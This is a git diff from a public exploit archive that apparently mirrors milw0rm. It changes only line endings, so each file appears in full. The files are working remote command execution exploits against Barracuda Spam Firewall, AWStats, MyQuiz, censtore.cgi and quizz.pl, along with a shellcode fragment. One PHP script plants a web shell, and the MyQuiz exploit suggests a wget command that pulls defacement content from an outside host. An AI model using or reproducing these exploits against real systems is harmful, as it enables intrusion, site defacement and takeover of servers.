"\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" /* 14 characters. */ "\xff\xff\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e" /* 14 characters. */ - "\x2f\x73\x68\x00"; /* 4 characters; 46 characters total. */ - + "\x2f\x73\x68\x00"; /* 4 characters; 46 characters total. */ + # milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/bsdi_x86/shellcode/13260.c b/platforms/bsdi_x86/shellcode/13260.c index 14e0e1d5e..c0e214dfc 100755 --- a/platforms/bsdi_x86/shellcode/13260.c +++ b/platforms/bsdi_x86/shellcode/13260.c @@ -57,6 +57,6 @@ main() f = (int (*)()) code; printf("BSDi old shellcode, %d bytes\n", strlen(code)); (int)(*f)(); -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/cgi/webapps/1039.pl b/platforms/cgi/webapps/1039.pl index 6c48af32e..9bbabc45c 100755 --- a/platforms/cgi/webapps/1039.pl +++ b/platforms/cgi/webapps/1039.pl @@ -67,6 +67,6 @@ sleep(100); print "\n\n$$$ OK -- Now Try: Nc -v www.Site.com 4444 $$$\n"; print "$$ if This Port was Close , This mean is That , You Haven't Permission to Write in /TMP $$\n"; print "Enjoy ;)"; -### EOF ### - -# milw0rm.com [2005-06-11] +### EOF ### + +# milw0rm.com [2005-06-11] diff --git a/platforms/cgi/webapps/1040.c b/platforms/cgi/webapps/1040.c index 43d475db7..82f730acb 100755 --- a/platforms/cgi/webapps/1040.c +++ b/platforms/cgi/webapps/1040.c @@ -86,6 +86,6 @@ printf("Sending H3ll Packets...\n"); closesocket(sock); return 0; -} - -// milw0rm.com [2005-06-11] +} + +// milw0rm.com [2005-06-11] diff --git a/platforms/cgi/webapps/1041.pl b/platforms/cgi/webapps/1041.pl index 82ccde7cd..18b22637e 100755 --- a/platforms/cgi/webapps/1041.pl +++ b/platforms/cgi/webapps/1041.pl @@ -119,6 +119,6 @@ print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\n"; print "If connect back shell not found:\n"; print "- you do not have privileges to write in /tmp\n"; print "- Shell not vulnerable\n\n\n"; -print "We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk\n\n\n"; - -# milw0rm.com [2005-06-11] +print "We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk\n\n\n"; + +# milw0rm.com [2005-06-11] diff --git a/platforms/cgi/webapps/1048.pl b/platforms/cgi/webapps/1048.pl index 3b7116dbb..3af16fece 100755 --- a/platforms/cgi/webapps/1048.pl +++ b/platforms/cgi/webapps/1048.pl @@ -69,6 +69,6 @@ print $socket "Pragma: no-cache\n"; print $socket "Cache-Control: no-cache\n"; print $socket "Connection: close\n\n"; -print "have nice shell..."; - -# milw0rm.com [2005-06-15] +print "have nice shell..."; + +# milw0rm.com [2005-06-15] diff --git a/platforms/cgi/webapps/1120.pl b/platforms/cgi/webapps/1120.pl index 7147f9d0b..050ef2872 100755 --- a/platforms/cgi/webapps/1120.pl +++ b/platforms/cgi/webapps/1120.pl @@ -124,6 +124,6 @@ elsif($opt eq "upload") { &upload_file($lfile); } - print "done.\n"; - -# milw0rm.com [2005-07-25] + print "done.\n"; + +# milw0rm.com [2005-07-25] diff --git a/platforms/cgi/webapps/1194.c b/platforms/cgi/webapps/1194.c index a9abc484e..bf7f1ce80 100755 --- a/platforms/cgi/webapps/1194.c +++ b/platforms/cgi/webapps/1194.c @@ -148,6 +148,6 @@ printf("\n\n"); close(sock); return 0; - } - -// milw0rm.com [2005-09-04] + } + +// milw0rm.com [2005-09-04] diff --git a/platforms/cgi/webapps/1236.pm b/platforms/cgi/webapps/1236.pm index bb32aa750..3f7d292cf 100755 --- a/platforms/cgi/webapps/1236.pm +++ b/platforms/cgi/webapps/1236.pm @@ -1,189 +1,189 @@ -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::barracuda_img_exec; -use base "Msf::Exploit"; -use strict; -use Pex::Text; -use bytes; - -my $advanced = { }; - -my $info = { - 'Name' => 'Barracuda IMG.PL Remote Command Execution', - 'Version' => '$Revision: 1.0 $', - 'Authors' => [ 'Nicolas Gregoire ' ], - 'Arch' => [ 'x86' ], - 'OS' => [ 'linux' ], - 'Priv' => 0, - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 8000], - 'VHOST' => [0, 'DATA', 'The virtual host name of the server'], - 'IMG' => [1, 'DATA', 'Full path of img.pl script', '/cgi-bin/img.pl'], - 'SSL' => [0, 'BOOL', 'Use SSL'], - }, - - 'Description' => Pex::Text::Freeform(qq{ - This module exploits an arbitrary command execution vulnerability in the - Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable. -}), - - 'Refs' => - [ - ['URL', 'http://www.securiweb.net/wiki/Ressources/AvisDeSecurite/2005.1'], - ['CVE', '2005-2847'], - ['OSVDB', '19279'], - ['BID', '14712'], - ['NSS', '19556'], - ], - - 'Payload' => - { - 'Space' => 512, - 'Keys' => ['cmd'], - }, - - 'Keys' => ['barracuda'], - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Check { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $vhost = $self->VHost; - my $target_port = $self->GetVar('RPORT'); - my $img = $self->GetVar('IMG'); - - my $request = - "GET $img?f=%2e%2e/etc/hosts HTTP/1.1\r\n". - "Accept: */*\r\n". - "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n". - "Host: $vhost:$target_port\r\n". - "Connection: Close\r\n". - "\r\n"; - - my $s = Msf::Socket::Tcp->new( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'SSL' => $self->GetVar('SSL'), - ); - - if ($s->IsError){ - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return $self->CheckCode('Connect'); - } - - $self->PrintLine("[*] Establishing a connection to the target..."); - - $s->Send($request); - my $results = $s->Recv(-1, 20); - $s->Close(); - - if (($results =~ /HTTP\/1\..\s+200/) && ($results =~/127\.0\.0\.1/)) { - - $self->PrintLine("[*] Vulnerable server detected!"); - return $self->CheckCode('Confirmed'); - - } elsif ($results =~ /HTTP\/1\..\s+([345]\d+)/) { - - $self->PrintLine("[*] The Barraccuda application was not found."); - return $self->CheckCode('Safe'); - } - - $self->PrintLine("[*] Generic error..."); - return $self->CheckCode('Generic'); -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $vhost = $self->VHost; - my $target_port = $self->GetVar('RPORT'); - my $img = $self->GetVar('IMG'); - my $encodedPayload = $self->GetVar('EncodedPayload'); - my $cmd = $encodedPayload->RawPayload; - - $img = $img."?f=".$self->URLEncode(qq#../bin/sh -c "echo 'YYY';#. $cmd .qq#;echo 'YYY'"|#); - - my $request = - "GET $img HTTP/1.1\r\n". - "Accept: */*\r\n". - "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n". - "Host: $vhost:$target_port\r\n". - "Connection: Close\r\n". - "\r\n"; - - my $s = Msf::Socket::Tcp->new( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'SSL' => $self->GetVar('SSL'), - ); - - if ($s->IsError){ - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - $self->PrintLine("[*] Establishing a connection to the target..."); - $s->Send($request); - my $results = $s->Recv(-1, 20); - - if ($results =~ /HTTP\/1\.. 200 OK/im) { - - (undef, $results) = split(/YYY/, $results); - - $self->PrintLine(' '); - $self->PrintLine("$results"); - $self->PrintLine(' '); - - $self->PrintLine("[*] End of data."); - - } else { - $self->PrintLine(' '); - $self->PrintLine("Doh ! Are you sure this server is vulnerable ?"); - } - - $s->Close(); - return; -} - -sub URLEncode { - my $self = shift; - my $data = shift; - my $res; - - foreach my $c (unpack('C*', $data)) { - if ( - ($c >= 0x30 && $c <= 0x39) || - ($c >= 0x41 && $c <= 0x5A) || - ($c >= 0x61 && $c <= 0x7A) - ) { - $res .= chr($c); - } else { - $res .= sprintf("%%%.2x", $c); - } - } - return $res; -} - -sub VHost { - my $self = shift; - my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST'); - return $name; -} - -1; - -# milw0rm.com [2005-09-27] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. +## + +package Msf::Exploit::barracuda_img_exec; +use base "Msf::Exploit"; +use strict; +use Pex::Text; +use bytes; + +my $advanced = { }; + +my $info = { + 'Name' => 'Barracuda IMG.PL Remote Command Execution', + 'Version' => '$Revision: 1.0 $', + 'Authors' => [ 'Nicolas Gregoire ' ], + 'Arch' => [ 'x86' ], + 'OS' => [ 'linux' ], + 'Priv' => 0, + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 8000], + 'VHOST' => [0, 'DATA', 'The virtual host name of the server'], + 'IMG' => [1, 'DATA', 'Full path of img.pl script', '/cgi-bin/img.pl'], + 'SSL' => [0, 'BOOL', 'Use SSL'], + }, + + 'Description' => Pex::Text::Freeform(qq{ + This module exploits an arbitrary command execution vulnerability in the + Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable. +}), + + 'Refs' => + [ + ['URL', 'http://www.securiweb.net/wiki/Ressources/AvisDeSecurite/2005.1'], + ['CVE', '2005-2847'], + ['OSVDB', '19279'], + ['BID', '14712'], + ['NSS', '19556'], + ], + + 'Payload' => + { + 'Space' => 512, + 'Keys' => ['cmd'], + }, + + 'Keys' => ['barracuda'], + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Check { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $vhost = $self->VHost; + my $target_port = $self->GetVar('RPORT'); + my $img = $self->GetVar('IMG'); + + my $request = + "GET $img?f=%2e%2e/etc/hosts HTTP/1.1\r\n". + "Accept: */*\r\n". + "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n". + "Host: $vhost:$target_port\r\n". + "Connection: Close\r\n". + "\r\n"; + + my $s = Msf::Socket::Tcp->new( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'SSL' => $self->GetVar('SSL'), + ); + + if ($s->IsError){ + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return $self->CheckCode('Connect'); + } + + $self->PrintLine("[*] Establishing a connection to the target..."); + + $s->Send($request); + my $results = $s->Recv(-1, 20); + $s->Close(); + + if (($results =~ /HTTP\/1\..\s+200/) && ($results =~/127\.0\.0\.1/)) { + + $self->PrintLine("[*] Vulnerable server detected!"); + return $self->CheckCode('Confirmed'); + + } elsif ($results =~ /HTTP\/1\..\s+([345]\d+)/) { + + $self->PrintLine("[*] The Barraccuda application was not found."); + return $self->CheckCode('Safe'); + } + + $self->PrintLine("[*] Generic error..."); + return $self->CheckCode('Generic'); +} + +sub Exploit { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $vhost = $self->VHost; + my $target_port = $self->GetVar('RPORT'); + my $img = $self->GetVar('IMG'); + my $encodedPayload = $self->GetVar('EncodedPayload'); + my $cmd = $encodedPayload->RawPayload; + + $img = $img."?f=".$self->URLEncode(qq#../bin/sh -c "echo 'YYY';#. $cmd .qq#;echo 'YYY'"|#); + + my $request = + "GET $img HTTP/1.1\r\n". + "Accept: */*\r\n". + "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n". + "Host: $vhost:$target_port\r\n". + "Connection: Close\r\n". + "\r\n"; + + my $s = Msf::Socket::Tcp->new( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'SSL' => $self->GetVar('SSL'), + ); + + if ($s->IsError){ + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return; + } + + $self->PrintLine("[*] Establishing a connection to the target..."); + $s->Send($request); + my $results = $s->Recv(-1, 20); + + if ($results =~ /HTTP\/1\.. 200 OK/im) { + + (undef, $results) = split(/YYY/, $results); + + $self->PrintLine(' '); + $self->PrintLine("$results"); + $self->PrintLine(' '); + + $self->PrintLine("[*] End of data."); + + } else { + $self->PrintLine(' '); + $self->PrintLine("Doh ! Are you sure this server is vulnerable ?"); + } + + $s->Close(); + return; +} + +sub URLEncode { + my $self = shift; + my $data = shift; + my $res; + + foreach my $c (unpack('C*', $data)) { + if ( + ($c >= 0x30 && $c <= 0x39) || + ($c >= 0x41 && $c <= 0x5A) || + ($c >= 0x61 && $c <= 0x7A) + ) { + $res .= chr($c); + } else { + $res .= sprintf("%%%.2x", $c); + } + } + return $res; +} + +sub VHost { + my $self = shift; + my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST'); + return $name; +} + +1; + +# milw0rm.com [2005-09-27] diff --git a/platforms/cgi/webapps/1471.pl b/platforms/cgi/webapps/1471.pl index 21bb0a4ee..2355fce91 100755 --- a/platforms/cgi/webapps/1471.pl +++ b/platforms/cgi/webapps/1471.pl @@ -1,39 +1,39 @@ -#!/usr/bin/perl -# => MyQuiz Remote Command Execution Exploit -# -> By Hessam-x / www.hackerz.ir -# manual exploiting --> http://[target]/cgi-bin/myquiz.pl/ask/;| -# SecurityFocus [bug] : http://www.securityfocus.com/archive/1/423921/30/0/threaded -# / | \_____ ____ | | __ ___________________ -#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / -#\ Y // __ \\ \___| <\ ___/| | \// / -# \___|_ /(____ /\___ >__|_ \\___ >__| /_____ \ -# \/ \/ \/ \/ \/ \/ -# Iran Hackerz Security Team -# Hessam-x : www.hessamx.net - -use LWP::Simple; - -print "-------------------------------------------\n"; -print "= MyQuiz Remote Command Execution Exploit =\n"; -print "= By Hessam-x - www.hackerz.ir =\n"; -print "-------------------------------------------\n\n"; - - - print "Target(www.example.com)\> "; - chomp($targ = ); - - print "path: (/cgi-bin/myquiz.pl/ask/)\>"; - chomp($path=); - - print "command: (wget www.hackerz.ir/deface.htm)\>"; - chomp($comd=); - - -$page=get("http://".$targ.$path) || die "[-] Unable to retrieve: $!"; -print "[+] Connected to: $targ\n"; -print "[~] Sending exploiting request,wait....\n"; -get("http://".$targ.$path.";".$comd."|") -print "[+] Exploiting request done!\n"; -print "Enjoy !"; - -# milw0rm.com [2006-02-06] +#!/usr/bin/perl +# => MyQuiz Remote Command Execution Exploit +# -> By Hessam-x / www.hackerz.ir +# manual exploiting --> http://[target]/cgi-bin/myquiz.pl/ask/;| +# SecurityFocus [bug] : http://www.securityfocus.com/archive/1/423921/30/0/threaded +# / | \_____ ____ | | __ ___________________ +#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / +#\ Y // __ \\ \___| <\ ___/| | \// / +# \___|_ /(____ /\___ >__|_ \\___ >__| /_____ \ +# \/ \/ \/ \/ \/ \/ +# Iran Hackerz Security Team +# Hessam-x : www.hessamx.net + +use LWP::Simple; + +print "-------------------------------------------\n"; +print "= MyQuiz Remote Command Execution Exploit =\n"; +print "= By Hessam-x - www.hackerz.ir =\n"; +print "-------------------------------------------\n\n"; + + + print "Target(www.example.com)\> "; + chomp($targ = ); + + print "path: (/cgi-bin/myquiz.pl/ask/)\>"; + chomp($path=); + + print "command: (wget www.hackerz.ir/deface.htm)\>"; + chomp($comd=); + + +$page=get("http://".$targ.$path) || die "[-] Unable to retrieve: $!"; +print "[+] Connected to: $targ\n"; +print "[~] Sending exploiting request,wait....\n"; +get("http://".$targ.$path.";".$comd."|") +print "[+] Exploiting request done!\n"; +print "Enjoy !"; + +# milw0rm.com [2006-02-06] diff --git a/platforms/cgi/webapps/1508.pl b/platforms/cgi/webapps/1508.pl index b31849f70..b18409d50 100755 --- a/platforms/cgi/webapps/1508.pl +++ b/platforms/cgi/webapps/1508.pl @@ -1,86 +1,86 @@ -#!/usr/bin/perl - -## AWStats < 6.4 command execution exploit -## based on http://www.idefense.com/application/poi/display?id=290&type=vulnerabilities -## (c)oded by 1dt.w0lf -## 11.08.2005 -## RST/GHC -## http://rst.void.ru -## http://ghc.ru - -## Note -## Exploitation will not occur until the stats page has been regenerated -## with the tainted referrer values from the http access log. -## AWStats is only vulnerable in situations where at least one URLPlugin is enabled. - - -use LWP::UserAgent; -use HTTP::Headers; - -if(@ARGV<1) { &usage; exit(0); } - -$path = $ARGV[0]; -header(); -print "Creating shell... Please wait\n"; - - $aw = LWP::UserAgent->new() or die; - $req = HTTP::Request->new(GET => $path); - $req->referer(qq[http://'.system(\$FilterEx{\'refererpages\'}).']); - $res = $aw->request($req); - - $aw = LWP::UserAgent->new() or die; - $res = $aw->get($path.'?output=refererpages&update=1'); - -while () - { - print "Type command for execute or 'q' for exit # "; - while() - { - $cmd=$_; - chomp($cmd); - exit() if ($cmd eq 'q'); - last; - } - &run($cmd); - } - -sub run() - { - $cmd2 = 'echo 1 && echo _START_ && '; - $cmd2 .= $cmd; - $cmd2 .= ' && echo _END_'; - $aw = LWP::UserAgent->new() or die; - $res = $aw->post( - "$path", - { - "output" => "refererpages", - "refererpagesfilterex" => "$cmd2" - } - ); - @result = split(/\n/,$res->content); - $runned = 0; - $on = 0; - print "\n"; - for $res(@result) - { - if ($res =~ /^_END_/) { print "\n"; return 0; } - if ($on == 1) { print " $res\n"; } - if ($res =~ /^_START_/) { $on = 1; $runned = 1; } - } - print "Can't execute command\n" if !$runned; - } - -sub header() -{ - print "--* AWStats < 6.4 exploit by RST/GHC\n"; - print "--* keep it private, not for public\n"; -} - -sub usage() - { - header(); - print "usage : r57awstats.pl [path_to_awstats.pl]\n"; - print " e.g.: r57awstats.pl http://127.0.0.1/cgi-bin/awstats.pl\n"; - } - -# milw0rm.com [2006-02-17] +#!/usr/bin/perl + +## AWStats < 6.4 command execution exploit +## based on http://www.idefense.com/application/poi/display?id=290&type=vulnerabilities +## (c)oded by 1dt.w0lf +## 11.08.2005 +## RST/GHC +## http://rst.void.ru +## http://ghc.ru + +## Note +## Exploitation will not occur until the stats page has been regenerated +## with the tainted referrer values from the http access log. +## AWStats is only vulnerable in situations where at least one URLPlugin is enabled. + + +use LWP::UserAgent; +use HTTP::Headers; + +if(@ARGV<1) { &usage; exit(0); } + +$path = $ARGV[0]; +header(); +print "Creating shell... Please wait\n"; + + $aw = LWP::UserAgent->new() or die; + $req = HTTP::Request->new(GET => $path); + $req->referer(qq[http://'.system(\$FilterEx{\'refererpages\'}).']); + $res = $aw->request($req); + + $aw = LWP::UserAgent->new() or die; + $res = $aw->get($path.'?output=refererpages&update=1'); + +while () + { + print "Type command for execute or 'q' for exit # "; + while() + { + $cmd=$_; + chomp($cmd); + exit() if ($cmd eq 'q'); + last; + } + &run($cmd); + } + +sub run() + { + $cmd2 = 'echo 1 && echo _START_ && '; + $cmd2 .= $cmd; + $cmd2 .= ' && echo _END_'; + $aw = LWP::UserAgent->new() or die; + $res = $aw->post( + "$path", + { + "output" => "refererpages", + "refererpagesfilterex" => "$cmd2" + } + ); + @result = split(/\n/,$res->content); + $runned = 0; + $on = 0; + print "\n"; + for $res(@result) + { + if ($res =~ /^_END_/) { print "\n"; return 0; } + if ($on == 1) { print " $res\n"; } + if ($res =~ /^_START_/) { $on = 1; $runned = 1; } + } + print "Can't execute command\n" if !$runned; + } + +sub header() +{ + print "--* AWStats < 6.4 exploit by RST/GHC\n"; + print "--* keep it private, not for public\n"; +} + +sub usage() + { + header(); + print "usage : r57awstats.pl [path_to_awstats.pl]\n"; + print " e.g.: r57awstats.pl http://127.0.0.1/cgi-bin/awstats.pl\n"; + } + +# milw0rm.com [2006-02-17] diff --git a/platforms/cgi/webapps/1669.pl b/platforms/cgi/webapps/1669.pl index 30612080c..c61db0873 100755 --- a/platforms/cgi/webapps/1669.pl +++ b/platforms/cgi/webapps/1669.pl @@ -1,44 +1,44 @@ -#!/usr/bin/perl -# -# Censtore.cgi exploit by FOX_MULDER (fox_mulder@abv.bg) -# -# Vulnerability foud by FOX_MULDER. -# -# This is the first exploit i release and the bug is not public so enjoy. -# Ask http://censtore.com/ what they think about it !!! -# -########################### - -use IO::Socket; -use LWP::Simple; - -sub Usage { -print STDERR "\nFOX_MULDER DID IT AGAIN !!!\n"; -print STDERR "Usage:\ncenex.pl \"cmd\"\n"; -exit; -} - -if (@ARGV < 3) -{ - Usage(); -} - - -$host = @ARGV[0]; -$path = @ARGV[1]; -$command = @ARGV[2]; -print "\n\n !!! ULTRA PRIVATE EDITION !!! \n\n"; -print "censtore.cgi Remote Command Execution Exploit by FOX_MULDER\n"; - -print "\n[+] Conecting to $host\n"; - -my $result = get("http://$host$path/censtore.cgi?page=|$command|"); - -if (defined $result) { -print $result; -} -else { -print "Error with request.\n"; -} - -# milw0rm.com [2006-04-13] +#!/usr/bin/perl +# +# Censtore.cgi exploit by FOX_MULDER (fox_mulder@abv.bg) +# +# Vulnerability foud by FOX_MULDER. +# +# This is the first exploit i release and the bug is not public so enjoy. +# Ask http://censtore.com/ what they think about it !!! +# +########################### + +use IO::Socket; +use LWP::Simple; + +sub Usage { +print STDERR "\nFOX_MULDER DID IT AGAIN !!!\n"; +print STDERR "Usage:\ncenex.pl \"cmd\"\n"; +exit; +} + +if (@ARGV < 3) +{ + Usage(); +} + + +$host = @ARGV[0]; +$path = @ARGV[1]; +$command = @ARGV[2]; +print "\n\n !!! ULTRA PRIVATE EDITION !!! \n\n"; +print "censtore.cgi Remote Command Execution Exploit by FOX_MULDER\n"; + +print "\n[+] Conecting to $host\n"; + +my $result = get("http://$host$path/censtore.cgi?page=|$command|"); + +if (defined $result) { +print $result; +} +else { +print "Error with request.\n"; +} + +# milw0rm.com [2006-04-13] diff --git a/platforms/cgi/webapps/1670.pl b/platforms/cgi/webapps/1670.pl index 74ca2fc9b..7cdf933bd 100755 --- a/platforms/cgi/webapps/1670.pl +++ b/platforms/cgi/webapps/1670.pl @@ -1,48 +1,48 @@ -#!/usr/bin/perl -# -# quizz.p exploit by FOX_MULDER (fox_mulder@abv.bg) -# -# Vulnerability foud by WBYTE. -# -# Born to be root !!! -# -# !!!!!!!!!!!!!!!THANKS to WBYTE !!!!!!!!!!!!!!!!! -# -# FACT:Wbyte doesn't sleeps , he waits !. -# 0day -#################################################################################### - -use IO::Socket; -use LWP::Simple; - -sub Usage { -print STDERR "\nFOX_MULDER DID IT AGAIN !!!\n"; -print STDERR "Usage:\nquiz.pl \"cmd\"\n"; -exit; -} - -if (@ARGV < 3) -{ - Usage(); -} - - -$host = @ARGV[0]; -$path = @ARGV[1]; -$command = @ARGV[2]; -print "\n\n !!! PRIVATE PRIVATE PRIVATE !!! \n\n"; -print "quizz.pl 0day Remote Command Execution Exploit by FOX_MULDER\n"; - -print "\n[+] Conecting to $host\n"; -print "\n[+] Injecting command . . .\n\n"; - -my $result = get("http://$host$path/quizz.pl/ask/;$command|"); - -if (defined $result) { -print "fox\@nasa# $result"; -} -else { -print "Error with request.\n"; -} - -# milw0rm.com [2006-04-13] +#!/usr/bin/perl +# +# quizz.p exploit by FOX_MULDER (fox_mulder@abv.bg) +# +# Vulnerability foud by WBYTE. +# +# Born to be root !!! +# +# !!!!!!!!!!!!!!!THANKS to WBYTE !!!!!!!!!!!!!!!!! +# +# FACT:Wbyte doesn't sleeps , he waits !. +# 0day +#################################################################################### + +use IO::Socket; +use LWP::Simple; + +sub Usage { +print STDERR "\nFOX_MULDER DID IT AGAIN !!!\n"; +print STDERR "Usage:\nquiz.pl \"cmd\"\n"; +exit; +} + +if (@ARGV < 3) +{ + Usage(); +} + + +$host = @ARGV[0]; +$path = @ARGV[1]; +$command = @ARGV[2]; +print "\n\n !!! PRIVATE PRIVATE PRIVATE !!! \n\n"; +print "quizz.pl 0day Remote Command Execution Exploit by FOX_MULDER\n"; + +print "\n[+] Conecting to $host\n"; +print "\n[+] Injecting command . . .\n\n"; + +my $result = get("http://$host$path/quizz.pl/ask/;$command|"); + +if (defined $result) { +print "fox\@nasa# $result"; +} +else { +print "Error with request.\n"; +} + +# milw0rm.com [2006-04-13] diff --git a/platforms/cgi/webapps/1677.php b/platforms/cgi/webapps/1677.php index 4a574bc42..c653fc0ed 100755 --- a/platforms/cgi/webapps/1677.php +++ b/platforms/cgi/webapps/1677.php @@ -1,146 +1,146 @@ -#!/usr/bin/php -q -d short_open_tag=on - 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -$cmd="";$port=80;$proxy=""; - -for ($i=3; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} - -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -//step 1 -> retrieve application path -$packet ="GET ".$p."sysinfo.cgi?action=debugger HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -#echo quick_dump($packet); -sendpacketii($packet); -$temp=explode("name=\"pfad\" value=\"",$html); -$temp2=explode("\"",$temp[1]); -$pfad=$temp2[0]; -if ($pfad=='') {die("cannot retrieve document root...\r\n");} -echo "document root ->".$pfad."\r\n"; - - -//step 2 -> we don't see any output, so let's create a php shell, you know, I'm phpcentric -$temp=";echo \ > ".$pfad."/phpinfo.php"; -$temp=urlencode($temp); -$packet ="GET ".$p."sysinfo.cgi?action=systemdoc&name=".$temp." HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -#echo quick_dump($packet); -sendpacketii($packet); - -//step 3 -> launch commands -$packet ="GET /phpinfo.php?cmd=".urlencode($cmd)." HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -#echo quick_dump($packet); -sendpacketii($packet); -echo $html; -?> - -# milw0rm.com [2006-04-14] +#!/usr/bin/php -q -d short_open_tag=on + 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +$cmd="";$port=80;$proxy=""; + +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} + +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +//step 